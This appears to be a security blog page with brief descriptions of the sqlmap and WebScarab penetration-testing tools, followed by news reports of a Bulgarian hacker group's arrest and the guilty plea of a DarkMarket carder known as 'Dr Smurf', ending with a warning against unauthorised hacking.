sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. sqlmap homepage.

15. webscarab

WebScarab has a large amount of functionality, and as such can be quite intimidating to the new user. But, for the simplest case, intercepting and modifying requests and responses between a browser and HTTP/S server, there is not a lot that needs to be learned. WebScarab homepage.

 

51.526392 -0.091389

Bulgarian Hackers Group Arrested

Bulgarian authorities say that after months of investigation they have busted the “most powerful hacker group” in the country, the Cyber Warrior Invasion. The operation was conducted by Bulgaria’s Sector for Computer Crimes, Intellectual Property and Gambling and the territorial units of the Chief Directorate for Fight with Organized Crime in the municipalities of Pleven, Shumen, Plovdiv, Burgas, Haskovo, Stara Zagora and Kyustendil.

Using cyber “terrorist” methods, the group had attacked more than 500 websites worldwide, including those of financial institutions, web-based companies, and governmental and non-governmental organizations. On the confiscated computers, police discovered databases with large amounts of stolen emails, social network profiles and associated passwords, as well as stolen credit card data.

The site www.cwi-group.org was used by the members of the group to coordinate their activities. Constantly changing its location and using a complex system of “zombie” proxy servers they disguised its true location, and that of the administrators. Despite the attempts to wipe out their tracks, hackers were detected.The investigation unveiled that hacker group members followed a strict hierarchical order, evidencing the high degree of organization and coordination between them. They were structured into different groups according to their access and power: “Administrators”, “Moderator”, “Scanning team,” “Donors / Sponsors”, “Sectional moderators”, “Friends,” “VIP Members” and group “members.”

Four laptops, five desktop computers, seven portable digital information devices, three hard discs and over 200 CDs were seized.

51.526392 -0.091389

Dr Smurf ‘GUILTY’

A hacker who went by the online moniker of “Dr Smurf” on the underground DarkMarket cybercrime forum has pleaded guilty to charges of identity theft.

Tadas Petrauskas, a 23-year-old Lithuanian hacker who lives in Brick, New Jersey, was caught in 2008 after selling login names and passwords for $2,000 to an undercover FBI agent, and admitted breaking into computer systems and selling stolen credit card details via the DarkMarket website.

Unfortunately for Petrauskas, DarkMarket had been secretly under the control of FBI agents since 2006, who were using it as a means to gather information on those involved in computer crime.

The FBI were able to gather evidence from “Dr Smurf”‘s email accounts, and arrested Petrauskas at JFK airport in New York, after he arrived on a flight from Belgium.

Petrauskas is scheduled to be sentenced on 30 October. Although unlikely that he will receive the maximum sentence, Petrauskas could technically face up to five years in prison for his crimes.

This shouldn’t need to be said, but let me say it anyway. Don’t hack into computers which don’t belong to you. Not for fun. Not for money. It’s against the law, and if you are caught the penalties you end up paying could be very serious.

If you’re interested in learning more about DarkMarket, you should read Elinor Mills’ great article at CNET where she interviewed FBI agent J Keith Mularski, who posed as a hacker called “Master Splynter”, to infiltrate the underground forum: Q&A: FBI agent looks back on time posing as a cybercriminal.

51.526392 -0.091389